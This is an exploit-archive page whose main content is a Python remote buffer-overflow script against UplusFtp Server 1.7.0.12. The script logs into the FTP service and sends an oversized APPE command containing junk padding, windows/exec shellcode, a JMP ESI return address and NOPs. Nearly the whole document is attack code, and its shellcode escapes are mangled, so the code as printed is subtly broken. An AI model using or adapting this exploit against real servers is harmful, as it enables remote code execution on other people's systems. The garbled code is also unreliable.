[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : UplusFtp Server v1.7.0.12 Remote Buffer Overflow
# Published : 2010-02-04
# Author : b0telh0
# Previous Title : Hyleos ChemView v1.9.5.1 ActiveX Control Buffer Overflow Exploit (meta)
# Next Title : Vermillion FTP Deamon v1.31 Remote BOF Exploit
#!/usr/bin/python
#
# Title: UplusFtp Server 1.7.0.12 Remote Buffer Overflow
# Date: 02-03-2010
# Author: b0telh0
# Link: http://easyftpsvr.googlecode.com/files/uplusftp-server-1.7.0.12-en.zip
# Tested on: Windows XP SP3
# CWD, DELE, LIST, MKD, NLST (and etc) commands are also vulnerable.
#
import socket
import time
# windows/exec - 227 bytes
# EXITFUNC=process, CMD=calc.exe
shellcode = ("x29xc9xb1x33xdaxd3xbdx07x4ax9ex37xd9x74x24xf4"
"x5bx83xc3x04x31x6bx0fx03x6cx45x7cxc2x8exb1x09"
"x2dx6ex42x6axa7x8bx73xb8xd3xd8x26x0cx97x8cxca"
"xe7xf5x24x58x85xd1x4bxe9x20x04x62xeax84x88x28"
"x28x86x74x32x7dx68x44xfdx70x69x81xe3x7bx3bx5a"
"x68x29xacxefx2cxf2xcdx3fx3bx4axb6x3axfbx3fx0c"
"x44x2bxefx1bx0exd3x9bx44xafxe2x48x97x93xadxe5"
"x6cx67x2cx2cxbdx88x1fx10x12xb7x90x9dx6axffx16"
"x7ex19x0bx65x03x1axc8x14xdfxafxcdxbex94x08x36"
"x3fx78xcexbdx33x35x84x9ax57xc8x49x91x63x41x6c"
"x76xe2x11x4bx52xafxc2xf2xc3x15xa4x0bx13xf1x19"
"xaex5fx13x4dxc8x3dx79x90x58x38xc4x92x62x43x66"
"xfbx53xc8xe9x7cx6cx1bx4ex72x26x06xe6x1bxefxd2"
"xbbx41x10x09xffx7fx93xb8x7fx84x8bxc8x7axc0x0b"
"x20xf6x59xfex46xa5x5ax2bx25x28xc9xb7x84xcfx69"
"x5dxd9");
junk = "x90" * 41
eip = "x4exaex3ax7e" #7E3AAE4E JMP ESI USER32.dll
nops = "x90" * 28
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "n[+] UplusFtp Server v1.7.0.12 Exploit!"
connect=s.connect(('10.1.1.110',21))
d=s.recv(1024)
print "[+] " +d
print "[+] Sending username..."
time.sleep(1)
s.send('USER testrn')
s.recv(1024)
print "[+] Sending password..."
time.sleep(1)
s.send('PASS testrn')
s.recv(1024)
print "[+] Sending buffer..."
time.sleep(1)
s.send('APPE ' + junk + shellcode + eip + nops + 'rn')
print "[.] done!n"
except:
print "[-] Can't connect to ftp server!n"